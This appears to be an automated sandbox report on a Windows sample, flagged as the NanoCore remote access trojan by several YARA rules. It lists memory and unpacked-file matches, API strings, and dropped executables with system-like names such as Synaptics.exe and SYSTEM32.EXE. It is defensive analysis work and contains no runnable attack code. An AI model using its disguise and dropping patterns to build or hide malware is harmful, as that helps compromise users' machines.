            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 0049058C appears 56 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 004109E8 appears 31 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 004049C0 appears 66 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 004070F0 appears 69 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: String function: 00404CCC appears 49 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 0049058C appears 56 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 004109E8 appears 34 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 004049C0 appears 76 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 004070F0 appears 81 times
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: String function: 00404CCC appears 54 times
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0043F118 NtdllDefWindowProc_A,GetCapture,4_2_0043F118
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004598AC NtdllDefWindowProc_A,4_2_004598AC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,4_2_0045A054
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,4_2_0045A104
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,4_2_0045E9EC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,4_2_0044EA40
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042F60C NtdllDefWindowProc_A,4_2_0042F60C
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture,9_2_0043F118
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_004598AC NtdllDefWindowProc_A,9_2_004598AC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_0045A054
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_0045A104
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,9_2_0045E9EC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,733AB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,9_2_0044EA40
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0042F60C NtdllDefWindowProc_A,9_2_0042F60C
            Source: ._cache_y8kdmHi6x3.exe.4.dr Static PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Source: ._cache_y8kdmHi6x3.exe.4.dr Static PE information: Resource name: RBIND type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: WINDOWS.EXE.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Source: WINDOWS.EXE.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: y8kdmHi6x3.exe, 00000000.00000002.322526944.000000000077C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSkeet Swapper1.exe< vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe" vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.312757349.0000000000D8C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSkeet Swapper1.exe< vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe" vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenameStub.exe" vs y8kdmHi6x3.exe
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFileName vs y8kdmHi6x3.exe
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenameb! vs y8kdmHi6x3.exe
            Source: y8kdmHi6x3.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Synaptics.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: ._cache_WINDOWS.EXE.9.dr Static PE information: Section: .rsrc ZLIB complexity 0.995641331215
            Source: y8kdmHi6x3.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\y8kdmHi6x3.exe.log
            Source: classification engine Classification label: mal100.troj.evad.winEXE@47/38@27/5
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
